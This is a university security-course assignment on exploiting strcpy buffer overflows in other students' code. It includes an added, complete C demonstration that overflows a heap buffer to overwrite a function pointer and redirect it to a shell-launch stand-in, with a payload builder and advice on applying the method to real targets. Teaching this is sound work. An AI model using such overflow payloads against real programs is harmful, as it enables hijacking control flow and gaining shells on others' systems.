Due Date: Sat April 7, 2018 at 11:59pm.
In this project, you will work in teams (generally pairs) to look for and exploit vulnerabilities in other students' code.
Goal: The goal is to locate a vulnerability and overwrite a function pointer with an address that launches a shell (the shell-launch code is provided in cmpsc497-util.c).
Inputs: I have given each team one project submission that still contains strcpy calls, so I would suggest studying how those calls are used. I would expect that you can craft an input that overflows the destination of one of those strcpy calls. In addition, you can also use AFL to identify crashes in the program.
Extra Credit: For extra credit (25 points), you will need to craft an exploit that launches a shell for a submission that does not contain strcpy. I suggest running AFL on those submissions. Let me know if you want to try the extra credit assignment, and I will supply that code.
Task 0 - Setup: Add code to set the function pointers in struct A (see cmpsc497-formatX.h for the definition) to NULL when objects of struct A are created, probably in set_object (for "set") and unmarshall (for "get"), so that a non-NULL value seen later can only have come from an overwrite.
Task 1 - Identify Overflows: Next, identify buffer overflows in the project code by supplying an input that makes the program crash (segmentation fault) due to an overflow.
Task 2 - Detect Overflow: Add code to the project file that prints a message when a struct A function pointer has been changed to a non-NULL value; the message must only be printed when the function pointer is non-NULL.
Task 3 - Perform Overflow: Then, produce input that overflows into the function pointer and overwrites its value, so that the printf statement from Task 2 runs.
Task 4 - Invoke Shell: Finally, add code that calls the function pointer, and provide input that sets the pointer to the address of the shell-launch code so that the call invokes the shell.
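The five tasks above, worked end to end in one self-contained program. This is an added example, not the course's code and not the layout from cmpsc497-formatX.h: struct A, launch_shell_stub and unsafe_copy are stand-ins assumed for the demonstration (the real submissions use strcpy itself and the shell-launch code in cmpsc497-util.c). The stub records the call instead of exec'ing a shell, and the target address is taken from the running process; against a real submission you would read it from nm or gdb with ASLR disabled (or a non-PIE build) and write the payload to the separate input file.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for struct A (real layout: cmpsc497-formatX.h). All
 * the exploit needs is a fixed-size buffer directly before the pointer. */
struct A {
    char name[16];
    void (*fp)(struct A *);
    int id;
};

/* Stand-in for the shell-launch code in cmpsc497-util.c: records the call
 * instead of exec'ing /bin/sh, so the demo can run unattended. */
static int shell_invoked;
static void launch_shell_stub(struct A *self)
{
    (void)self;
    shell_invoked = 1;
}

/* The vulnerable primitive: strcpy semantics, kept out of line so the
 * compiler cannot reason about the overflow at the call site. */
static void __attribute__((noinline)) unsafe_copy(char *dst, const char *src)
{
    while ((*dst++ = *src++) != '\0')
        ;
}

/* Task 0: fp starts NULL, so a non-NULL value later can only come from the overflow. */
struct A *new_object(void)
{
    struct A *obj = calloc(1, sizeof *obj);
    if (obj == NULL) { perror("calloc"); exit(EXIT_FAILURE); }
    obj->fp = NULL;
    return obj;
}

/* Task 1: the overflow site. More than 15 bytes plus NUL spills into fp. */
void set_object(struct A *obj, const char *input)
{
    unsafe_copy(obj->name, input);
}

/* Task 2: print the message only when the pointer is non-NULL. */
int fp_was_overwritten(const struct A *obj)
{
    if (obj->fp == NULL)
        return 0;
    printf("struct A function pointer changed to %p\n", (void *)(uintptr_t)obj->fp);
    return 1;
}

/* Task 3: build the input. Filler length comes from offsetof(), so the payload
 * tracks the layout. The address goes in little-endian (x86-64); its trailing
 * zero bytes are not sent, since the copy's terminator writes one and the NULL
 * from Task 0 supplies the rest. An interior zero byte cannot pass through a
 * strcpy-style copy, so such an address is rejected (returns 0); under ASLR,
 * re-run or choose another target. Returns the payload length. */
size_t build_payload(char *out, size_t out_len, uintptr_t target)
{
    const unsigned char *b = (const unsigned char *)&target;
    size_t fill = offsetof(struct A, fp), n = sizeof target;

    while (n > 0 && b[n - 1] == 0)
        n--;
    for (size_t i = 0; i < n; i++)
        if (b[i] == 0)
            return 0;
    if (n == 0 || out_len < fill + n + 1)
        return 0;
    memset(out, 'A', fill);
    memcpy(out + fill, b, n);
    out[fill + n] = '\0';
    return fill + n;
}

/* Task 4: call the pointer. Returns 1 only if the overwrite was detected and
 * the call reached the shell stand-in. */
int run_exploit(const char *input)
{
    struct A *obj = new_object();
    shell_invoked = 0;
    set_object(obj, input);
    int hit = fp_was_overwritten(obj);
    if (hit)
        obj->fp(obj);
    free(obj);
    return hit && shell_invoked;
}

int main(void)
{
    char payload[64];
    if (build_payload(payload, sizeof payload, (uintptr_t)launch_shell_stub) == 0)
        return 1;
    return run_exploit(payload) ? 0 : 1;
}
```

Build with plain gcc (no special flags are needed; the overflow is in a heap object, so the stack protector never sees it) and run it: the Task 2 message prints the stub's address and the process exits 0 only if the stub actually ran. The detail worth carrying over to the real target is the terminator: a user-space x86-64 code address always ends in zero bytes, and a strcpy-style copy can only deliver the bytes before the first zero, so the overwrite works precisely because Task 0 left the pointer's high bytes at zero already.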
Teams:
Rasmussen and Betts
Drummond and Li
Barczinski, Bhogale, and Palmer
Norris and Rabbitz
Makwana and Lee
Mettler and Shringarputale
Johnson and Gleason
Pinto and Levine
Submit all the project code (including the Makefile) necessary to build and run your exploit, and an input (in a separate file) that reaches the furthest task. Also, please provide a README with instructions for running the input.
Ensure that your code runs correctly on machines in the CSE Linux Lab. Any one of these machines will be sufficient: cse-p204instXX.cse.psu.edu, where XX is a 2-digit number from 01 to at least 40.
A dropbox will be created on Canvas; submit your code, input, and README there by 11:59pm on Sat April 7, 2018.
You are to complete this project only with your team members. We will create a Piazza forum, and the only allowed sharing of project information is through that forum. Do not discuss this project with anyone outside of Piazza.